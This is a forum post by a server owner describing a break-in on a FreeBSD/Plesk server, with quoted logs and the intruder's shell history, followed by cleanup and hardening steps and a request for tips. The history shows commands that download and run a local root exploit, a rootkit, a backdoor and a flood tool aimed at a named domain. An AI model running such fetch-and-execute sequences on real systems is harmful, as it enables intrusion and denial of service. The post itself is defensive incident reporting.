Hacked, now what?

2025-04-11

what happend
Last week my Freebsd 4.9 with plesk 7.0.3 installed server got "hacked". I say "hacked", because its more that a scriptkiddy ran some scripts.

I had some eggdrops and iroffer running from /tmp installed by user "apache". They apparently came in using an exploit in phpbb or just php.

In my error_log i found this:

PHP Code:

 cd: can't cd to tmp 
cd: can't cd to tmp 
md: not found 
--20:53:42--  [url]http://cd/[/url] 
           => `index.html' 
Resolving cd... failed: No address associated with hostname. 
/tmp: Unsupported scheme. 
 
FINISHED --20:53:42-- 
Downloaded: 0 bytes in 0 files 
cd: can't cd to /tmp/iroffer1.4.b01.tgz 
iroffer: not found 
[Mon Nov 29 01:14:39 2004] [error] [client 127.0.0.1] request failed: erroneous characters after protocol string: POST /info.php?a[1]=test HTTP/1.0Host: doesnotreallymatter 
[Mon Nov 29 01:14:39 2004] [error] [client 127.0.0.1] request failed: erroneous characters after protocol string: POST /info.php?a[1]=test HTTP/1.0Host: doesnotreallymatter 
[Mon Nov 29 01:14:39 2004] [error] [client 127.0.0.1] request failed: erroneous characters after protocol string: POST /info.php?a[1]=test HTTP/1.0Host: doesnotreallymatter 
[Mon Nov 29 01:14:39 2004] [error] [client 127.0.0.1] request failed: erroneous characters after protocol string: POST /info.php?a[1]=test HTTP/1.0Host: doesnotreallymatter 
[Mon Nov 29 01:14:39 2004] [error] [client 127.0.0.1] request failed: erroneous characters after protocol string: POST /info.php?a[1]=test HTTP/1.0Host: doesnotreallymatter 
[Mon Nov 29 01:14:39 2004] [error] [client 127.0.0.1] request failed: erroneous characters after protocol string: POST /info.php?a[1]=test HTTP/1.0Host: doesnotreallymatter 
--16:05:49--  [url]http://*******.com/r0nin[/url] 
           => `r0nin.1' 
Resolving ******.com... done. 
Connecting to ******.com[**.**.**.**]:80... connected. 
HTTP request sent, awaiting response... 200 OK 
Length: unspecified [text/html] 
 
    0K                                                         708.98 KB/s 
 
16:05:50 (708.98 KB/s) - `r0nin.1' saved [726]

As you can see, first i got requests on /info.php?a[1]=test. I did research on this and i think they used this exploit http://www.addict3d.org/index.php?pa...curity&ID=2657
I also had php version 4.3.4 installed...

So they first used wget to download "r0nin", but because "r0nin" already excisted, wget renamed it to "r0nin.1". The eggdrops i found were installed at ~ nov. 14, but this is nov 29th. The first "hacker" edited the logs so i couldnt find info on him, but I know he did installed "r0nin" because that one already excisted as you can see above.

This are the commands that i found in .bash_history, of the 2nd "hacker"

PHP Code:

 ls 
cd tmp 
ls 
wget [url]http://*****/exploits/local/remap[/url] 
chmod 777 remap 
./remap 
./r0nin 
wget [url]http://*****/UNIX/penetration/rootkits/kbdv3.c[/url] 
gcc kbdv3.c 
wget [url]http://*****/codes/cancer[/url] 
chmod 777 cancer 
./cancer 
./cancer index.txt 
./cancer users.txt 
ls 
./cancer xx.txt 
wget [url]http://*****/exploits/backdoor/dc[/url] 
chmod 777 dc 
./dc 
./dc localhost 677 
./dc localhost 1666 
uname -r 
wget [url]http://******/exploits/ddos/f3[/url] 
chmod 777 f3 
./f3 
./f3 malianteo.com 677005 800 
./f3 malianteo.com 65535 800 
uname -ar 
uname -ar 
Linux ***** 2.4.2 FreeBSD 4.9-RELEASE #2: Wed Mar  3 21:12:13 CET 2004 
    erik@Ix i386 unknown 
id 
wget [url]http://*****/exploits/backdoor/cgi[/url] 
chmod 777 cgi 
./cgi 
exit 
cd tmp 
wget [url]http://*****/bsdlocal[/url] 
chmod 777 bsdlocal 
ls 
./bsdlocal 
ren 
rem 
rn 
rename

As you can see he wasnt too good since he was using linux tools on freebsd :p the file "f3" was a 404 html page too so he wasnt doing things well.

What did I do stop this
- I removed all the crap out of /tmp and /var/tmp.
- killed the processes they started
- had a guy looking at my server, he removed some more crap
- ran chkrootkit, nothing was found
- monitored my server for few days to make sure no new processes were started
- removed the cronjob they installed (wasnt working anymore anway, since it pointed to some file at /var/tmp which is gone now)

what did i do to prevent this from happening again
Since this server is pretty much used and im not able to reinstall it "just like that", i dont really want to reinstall the entire server, even though I know that is best to do. The server has been configured by an "experienced" admin who set up security tight, and since i didnt find anything out of /tmp/ and /var/tmp Im pretty sure that thats the only directories they were able to have access in.

- I installed plesk patch 7.0.4
- manually upgraded php to 4.3.9
- Changed php.ini, disabled functions like system,popen,exec etc.
- disabled allow_url_fopen
- disabled "expose php"
- chmodded wget so only root can use it
- chmodded lynx so only root can use it

what can i do more
I was thinking of mounting /tmp and /var/tmp as noexec, but since its no partition i can only do it by making a large file... but they can also just execute scripts from the basedir of the website (if they hack a website) so thats useless i guess...

I was thinking about the following steps:

- installing a firewall
- chmodding chmod so that only root can use chmod so they cant do chmod +x to run a file, but I think its also neccesarry on ftp...
- chmod gcc to 700... but they can also just upload compiled versions so thats not too much help

Thats it. Anyone else have tips on what i can do?

As I already said, reinstalling is really no option... Hacked, now what?